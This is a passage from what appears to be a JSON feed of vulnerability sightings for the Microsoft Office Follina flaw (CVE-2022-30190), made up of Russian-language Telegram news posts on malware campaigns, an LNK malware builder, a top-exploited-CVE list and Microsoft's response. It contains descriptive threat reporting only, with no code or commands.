\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c LNK, \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u043c\u044b\u0445 \u043a\u0430\u043a APT \u0438 
\u0441\u043a\u0438\u043b\u043b\u043e\u0432\u0430\u043d\u043d\u044b\u043c\u0438 \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u0430\u043c\u0438, \u0431\u044b\u043b \u0437\u0430\u043c\u0435\u0447\u0435\u043d \u0432 \u043f\u0435\u0440\u0438\u043e\u0434 \u0441 \u0430\u043f\u0440\u0435\u043b\u044f \u043f\u043e \u043c\u0430\u0439 \u044d\u0442\u043e\u0433\u043e \u0433\u043e\u0434\u0430 - \u043a\u0430\u043a \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u0441 Bumblebee\u00a0Loader \u0438\u00a0UAC-0010 (Armageddon).\n\n\u0420\u0435\u0441\u0435\u0440\u0447\u0435\u0440\u044b \u0441\u043e\u043e\u0431\u0449\u0430\u044e\u0442 \u043e \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u043b\u0430 Bumblebee \u0447\u0435\u0440\u0435\u0437 \u043a\u043e\u043d\u0442\u0430\u043a\u0442\u043d\u044b\u0435 \u0444\u043e\u0440\u043c\u044b \u043d\u0430 \u0432\u0435\u0431-\u0441\u0430\u0439\u0442\u0435 \u0446\u0435\u043b\u0438.\u00a0\u0412 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f\u0445 \u0443\u0442\u0432\u0435\u0440\u0436\u0434\u0430\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u0432\u0435\u0431-\u0441\u0430\u0439\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b \u0443\u043a\u0440\u0430\u0434\u0435\u043d\u043d\u044b\u0435 \u0438\u0437\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u0438\u044f \u0438 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043b \u0441\u0441\u044b\u043b\u043a\u0443, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0432 \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u043c \u0438\u0442\u043e\u0433\u0435 \u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u043b\u0430 \u0444\u0430\u0439\u043b ISO, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0439 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e.\n\nResecurity \u043f\u0440\u0438\u043f\u0438\u0441\u0430\u043b\u0430 \u044d\u0442\u0443 
\u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044e \u043a TA578, \u043d\u0430\u0447\u0438\u043d\u0430\u044f \u0441 \u043c\u0430\u044f 2020 \u0433\u043e\u0434\u0430. \u0410\u043a\u0442\u043e\u0440 \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u0435\u0442 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u043f\u043e \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043f\u043e\u0447\u0442\u0435 \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438 Ursnif, IcedID, KPOT Stealer, Buer Loader \u0438 BazaLoader, \u0430 \u0442\u0430\u043a\u0436\u0435 Cobalt Strike.\n\n\u041f\u043e \u043c\u043d\u0435\u043d\u0438\u044e \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u043e\u0432 Resecurity, \u0442\u0435\u043a\u0443\u0449\u0438\u0435 \u043a\u043b\u0438\u0435\u043d\u0442\u044b MLNK Builder \u043f\u043e\u043b\u0443\u0447\u0430\u044e\u0442 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0431\u0435\u0441\u043f\u043b\u0430\u0442\u043d\u043e, \u043d\u043e \u0430\u0432\u0442\u043e\u0440\u044b \u0442\u0430\u043a\u0436\u0435 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0438 \u0438 \u043f\u0440\u0438\u0432\u0430\u0442\u043d\u0443\u044e \u0432\u0435\u0440\u0441\u0438\u044e \u0434\u043b\u044f \u0443\u0437\u043a\u043e\u0433\u043e \u043a\u0440\u0443\u0433\u0430 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043e\u043f\u0435\u0440\u0430\u0442\u043e\u0440\u043e\u0432, \u0441 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u043b\u0438\u0446\u0435\u043d\u0437\u0438\u0435\u0439 \u043f\u043e \u0446\u0435\u043d\u0435 125 \u0434\u043e\u043b\u043b\u0430\u0440\u043e\u0432 \u0437\u0430 \u0441\u0431\u043e\u0440\u043a\u0443.\n\n\u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 
\u0431\u043e\u0433\u0430\u0442\u044b\u0439 \u0430\u0440\u0441\u0435\u043d\u0430\u043b \u0434\u043b\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432, \u0437\u0430\u043c\u0430\u0441\u043a\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043f\u043e\u0434 Microsoft Word, Adobe PDF, ZIP, JPG/.PNG, MP3 \u0438 \u0434\u0430\u0436\u0435 AVI, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0431\u043e\u043b\u0435\u0435 \u043f\u0440\u043e\u0434\u0432\u0438\u043d\u0443\u0442\u044b\u0435 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 \u0434\u043b\u044f \u0441\u043e\u043a\u0440\u044b\u0442\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438.\n\n\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u043b\u0438 \u0442\u0432\u043e\u0440\u0447\u0435\u0441\u043a\u0438\u0439 \u043f\u043e\u0434\u0445\u043e\u0434 \u0434\u043b\u044f \u043e\u0431\u043c\u0430\u043d\u0430 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u043e\u0432 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u0438 \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u043a\u043e\u043c\u0431\u0438\u043d\u0430\u0446\u0438\u044e \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0439 \u0438 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u0444\u043e\u0440\u043c\u0430\u0442\u043e\u0432 \u0444\u0430\u0439\u043b\u043e\u0432, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0431\u0438\u043d\u0430\u0440\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b Living Off the Land (LOLbins).\n\n\u0421\u0440\u0435\u0434\u0438 
\u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u044e\u0449\u0438\u0445 LNK \u0448\u0442\u0430\u043c\u043c\u043e\u0432 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e Resecurity \u0432\u044b\u0434\u0435\u043b\u044f\u044e\u0442 TA570\u00a0Qakbot\u00a0(Qbot), IcedID, AsyncRAT\u00a0\u0438 Emotet. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u044f\u044f \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043f\u043e \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044e Qakbot \u0442\u0430\u043a\u0436\u0435 \u0432\u043a\u043b\u044e\u0447\u0430\u043b\u0430 \u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u044b Word \u0441\u00a0CVE-2022-30190 (Follina).", "creation_timestamp": "2022-07-20T12:07:09.000000Z"}, {"uuid": "5460980a-2de9-4c2f-886c-cf8df6dfad2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/crackcodes/1915", "content": "#Analytics\nTop 10 most exploited vulnerabilities in 2022\n\n1. CVE-2022-30190: MS Office \"Follina\"\n\n2. CVE-2021-44228: Apache Log4Shell\n\n3. CVE-2022-22965: Spring4Shell\n\n4. CVE-2022-1388: F5 BIG-IP\n\n5. CVE-2022-0609: Google Chrome zero-day\nhttps://blog.google/threat-analysis-group/countering-threats-north-korea\n6. CVE-2017-11882: Old but not forgotten - MS Office bug\n\n7. CVE-2022-41082, CVE-2022-41040: ProxyNotShell\n\n8. CVE-2022-27925, CVE-2022-41352: Zimbra Collaboration Suite bugs\n\n\n9. CVE-2022-26134: Atlassian Confluence RCE flaw  \n\n10. 
CVE-2022-30525: Zyxel RCE vulnerability", "creation_timestamp": "2022-12-21T16:27:48.000000Z"}, {"uuid": "6458d13c-2967-4ea6-9afc-7231b57caa45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/true_secator/3478", "content": "\u041f\u0440\u043e\u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u0430\u044f \u0445\u0430\u043a\u0435\u0440\u0441\u043a\u0430\u044f \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 TA413 (\u0442\u0430\u043a\u0436\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430\u044f \u043a\u0430\u043a LuckyCat), \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 \u041a\u0438\u0442\u0430\u0435\u043c \u0431\u044b\u043b\u0430 \u0437\u0430\u043c\u0435\u0447\u0435\u043d\u0430 \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 \u043d\u0430 \u041f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u043e \u0422\u0438\u0431\u0435\u0442\u0430 \u0432 \u0438\u0437\u0433\u043d\u0430\u043d\u0438\u0438 \u0438\u043b\u0438 \u043a\u0430\u043a \u0435\u0435 \u0435\u0449\u0435 \u043d\u0430\u0437\u044b\u0432\u0430\u044e\u0442 \u0426\u0435\u043d\u0442\u0440\u0430\u043b\u044c\u043d\u043e\u0439 \u0442\u0438\u0431\u0435\u0442\u0441\u043a\u043e\u0439 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u0435\u0439.\n\n\u0412 \u0440\u0430\u043c\u043a\u0430\u0445 \u0448\u043f\u0438\u043e\u043d\u0441\u043a\u043e\u0439 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 APT \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0435 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u0438 \u0432 \u0431\u0440\u0430\u043d\u0434\u043c\u0430\u0443\u044d\u0440\u0435 Sophos \u0438 Microsoft Office (CVE-2022-1040 
\u0438 CVE-2022-30190) \u0434\u043b\u044f \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u044f \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0433\u043e \u0440\u0430\u043d\u0435\u0435 \u0431\u044d\u043a\u0434\u043e\u0440\u0430 LOWZERO.\n\n\u0412 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u043c \u0446\u0435\u043b\u044f\u043c\u0438 \u0431\u044b\u043b\u0438 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 \u0442\u0438\u0431\u0435\u0442\u0441\u043a\u043e\u0439 \u043e\u0431\u0449\u0438\u043d\u043e\u0439, \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u0438 \u043f\u0440\u0435\u0434\u043f\u0440\u0438\u044f\u0442\u0438\u044f, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 \u0442\u0438\u0431\u0435\u0442\u0441\u043a\u0438\u043c \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u043e\u043c \u043e \u0447\u0435\u043c \u0433\u043e\u0432\u043e\u0440\u0438\u0442\u0441\u044f \u0432 \u043e\u0442\u0447\u0435\u0442\u0435 Recorded Future.\n\n\u0410\u0442\u0430\u043a\u0438 LuckyCat \u043d\u0430 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u0438 \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u044b\u0445 \u043b\u0438\u0446, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0445 \u0441 \u0442\u0438\u0431\u0435\u0442\u0441\u043a\u0438\u043c \u0441\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u043e\u043c, \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0442\u0441\u044f \u043f\u043e \u043a\u0440\u0430\u0439\u043d\u0435\u0439 \u043c\u0435\u0440\u0435 \u0441 2020 \u0433\u043e\u0434\u0430 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c, \u0442\u0430\u043a\u0438\u0445 \u043a\u0430\u043a ExileRAT, Sepulcher \u0438 
\u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u044f \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430 Mozilla Firefox, \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0435\u0433\u043e \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 FriarFox .\n\n\u0412 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u043e\u0439 \u0430\u0442\u0430\u043a\u0435 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u043b\u0441\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 RTF-\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u0438 \u0432 \u0440\u0435\u0434\u0430\u043a\u0442\u043e\u0440\u0435 Microsoft Equation Editor \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u0438\u043c\u043f\u043b\u0430\u043d\u0442\u0430\u0442\u0430 LOWZERO. 
\u0412 \u0441\u043e\u0432\u043e\u043a\u0443\u043f\u043d\u043e\u0441\u0442\u0438 \u044d\u0442\u043e \u0431\u044b\u043b\u043e \u0434\u043e\u0441\u0442\u0438\u0433\u043d\u0443\u0442\u043e \u0437\u0430 \u0441\u0447\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430 Royal Road RTF, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0448\u0438\u0440\u043e\u043a\u043e \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d \u0441\u0440\u0435\u0434\u0438 \u043a\u0438\u0442\u0430\u0439\u0441\u043a\u0438\u0445 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432.\n\n\u0412 \u0434\u0440\u0443\u0433\u043e\u043c \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u043c \u043f\u0438\u0441\u044c\u043c\u0435, \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u043e\u0439 \u0442\u0438\u0431\u0435\u0442\u0441\u043a\u043e\u0439 \u0436\u0435\u0440\u0442\u0432\u043e\u0439 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u043e\u0441\u044c \u0432\u043b\u043e\u0436\u0435\u043d\u0438\u0435 Microsoft Word, \u0440\u0430\u0437\u043c\u0435\u0449\u0435\u043d\u043d\u043e\u0435 \u0432 \u0441\u043b\u0443\u0436\u0431\u0435 Google Firebase, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u043f\u044b\u0442\u0430\u043b\u043e\u0441\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Follina \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u044b PowerShell \u0441 \u043f\u043e\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u043e\u0439 \u0431\u044d\u043a\u0434\u043e\u0440\u0430 \u0441 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e 
\u0441\u0435\u0440\u0432\u0435\u0440\u0430.\n\n\u0411\u044d\u043a\u0434\u043e\u0440 LOWZERO \u0438\u043c\u0435\u0435\u0442 \u043c\u043e\u0434\u0443\u043b\u044c\u043d\u0443\u044e \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443 \u0438 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u044b\u0435 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u0435 \u043c\u043e\u0434\u0443\u043b\u0438 \u0441 C2, \u0435\u0441\u043b\u0438 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u0430\u044f \u043c\u0430\u0448\u0438\u043d\u0430 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0438\u043d\u0442\u0435\u0440\u0435\u0441 \u0434\u043b\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u0441\u0432\u044f\u0437\u0430\u0442\u044c \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0439 \u0441 \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u044c\u044e \u0433\u0440\u0443\u043f\u043f\u044b \u0438\u0437-\u0437\u0430 \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u0441\u0443\u0431\u044a\u0435\u043a\u0442\u044b \u0443\u0433\u0440\u043e\u0437\u044b \u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u043e\u0434\u043d\u0438 \u0438 \u0442\u0435 \u0436\u0435 \u0430\u0434\u0440\u0435\u0441\u0430 \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u0435\u0439 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043f\u043e\u0447\u0442\u044b \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u043b\u0435\u0442 (\u0442\u0430\u043a\u0438\u0435 
\u043a\u0430\u043a tseringkanyaq@yahoo[.]com \u0438 mediabureauin@gmail[.]com).\n\n\u0421\u043e \u0441\u043b\u043e\u0432 \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u043e\u0432, \u0433\u0440\u0443\u043f\u043f\u0430 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442 \u0432\u043d\u0435\u0434\u0440\u044f\u0442\u044c \u043d\u043e\u0432\u044b\u0435 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438, \u043f\u043e\u043b\u0430\u0433\u0430\u044f\u0441\u044c \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u043d\u0430 \u043f\u0440\u043e\u0432\u0435\u0440\u0435\u043d\u043d\u044b\u0435 \u043f\u0440\u0430\u043a\u0442\u0438\u043a\u043e\u0439 TTP.", "creation_timestamp": "2022-09-27T16:57:07.000000Z"}, {"uuid": "588edee4-22c6-4038-b3d1-820876ef143b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/true_secator/2998", "content": "\u0418\u043c\u043f\u0435\u0440\u0438\u044f \u043d\u0430\u043d\u043e\u0441\u0438\u0442 \u043e\u0442\u0432\u0435\u0442\u043d\u044b\u0439 \u0443\u0434\u0430\u0440, \u043f\u0440\u0430\u0432\u0434\u0430 \u043d\u0435\u043f\u043e\u043d\u044f\u0442\u043d\u043e \u0432 \u043a\u0430\u043a\u0443\u044e \u0441\u0442\u043e\u0440\u043e\u043d\u0443.\n\n\u041f\u043e\u0441\u043b\u0435 \u0432\u0441\u0435\u043e\u0431\u0449\u0435\u0433\u043e \u043d\u0435\u0433\u043e\u0434\u043e\u0432\u0430\u043d\u0438\u044f Microsoft \u0432\u0441\u0435 \u0436\u0435 \u043f\u0440\u0438\u0441\u0432\u043e\u0438\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 Follina \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 CVE-2022-30190, \u043e\u0446\u0435\u043d\u0438\u0432 \u0435\u0435 \u043d\u0430 7,8 \u0438\u0437 10 \u043f\u043e CVSS. 
\u041e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u043c\u0438 \u0432\u0435\u0440\u0441\u0438\u044f\u043c\u0438 \u043f\u0440\u0438\u0437\u043d\u0430\u043d\u044b Microsoft Office Office 2013, Office 2016, Office 2019 \u0438 Office 2021, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0432\u044b\u043f\u0443\u0441\u043a\u0438 Professional Plus.\n\n\u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u0438\u043b\u0438 \u0438 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 (\u0437\u0434\u0435\u0441\u044c), \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u043e\u0431\u0445\u043e\u0434\u043d\u044b\u0435 \u043f\u0443\u0442\u0438 \u043f\u043e \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044e \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 URL-\u0430\u0434\u0440\u0435\u0441\u043e\u0432 MSDT \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043c\u043e\u0434\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0440\u0435\u0435\u0441\u0442\u0440\u0430 Windows, \u0447\u0442\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0438\u0432\u0430\u0435\u0442 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u0435 Microsoft Office \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0438\u0437 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0430 \u0432 \u0440\u0435\u0436\u0438\u043c\u0435 \u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0441\u043c\u043e\u0442\u0440\u0430 \u0438\u043b\u0438 Application Guard \u0434\u043b\u044f Office \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e.\n\n\u041f\u0435\u0440\u0432\u044b\u0435 \u043f\u0440\u0438\u0437\u043d\u0430\u043a\u0438 
\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u0434\u0430\u0442\u0438\u0440\u0443\u044e\u0442\u0441\u044f 12 \u0430\u043f\u0440\u0435\u043b\u044f 2022 \u0433\u043e\u0434\u0430, \u043a\u043e\u0433\u0434\u0430 \u0432 \u0431\u0430\u0437\u0443 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c \u0431\u044b\u043b \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d \u0432\u0442\u043e\u0440\u043e\u0439 \u043e\u0431\u0440\u0430\u0437\u0435\u0446, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u044b\u043b \u0437\u0430\u0442\u043e\u0447\u0435\u043d \u043f\u043e\u0434 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0433\u043e \u043a\u043b\u0438\u0435\u043d\u0442\u0430, \u043e \u0447\u0435\u043c \u0441\u0432\u0438\u0434\u0435\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0443\u0435\u0442 \u043d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u0440\u0438\u0433\u043b\u0430\u0448\u0435\u043d\u0438\u0435 \u043d\u0430 \u0438\u043d\u0442\u0435\u0440\u0432\u044c\u044e.doc \u0432 \u044d\u0444\u0438\u0440 \u0440\u0430\u0434\u0438\u043e Sputnik.\n\n\u041d\u043e \u0432\u0441\u0435 \u044d\u0442\u043e \u043d\u0438\u043a\u0430\u043a \u043d\u0435 \u043c\u0435\u043d\u044f\u0435\u0442 \u0442\u043e\u0433\u043e, \u0447\u0442\u043e Microsoft \u0435\u0449\u0451 21 \u0430\u043f\u0440\u0435\u043b\u044f \u0437\u0430\u043a\u0440\u044b\u043b\u0430 \u043e\u0442\u0447\u0435\u0442 \u0441\u043e \u0441\u0441\u044b\u043b\u043a\u043e\u0439 \u043d\u0430 \u0442\u043e, \u0447\u0442\u043e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0431\u044b\u043b\u0430 (\u0432\u043e\u0432\u0441\u0435 \u043d\u0435 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430) \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430 \u0438 \u043d\u0435 
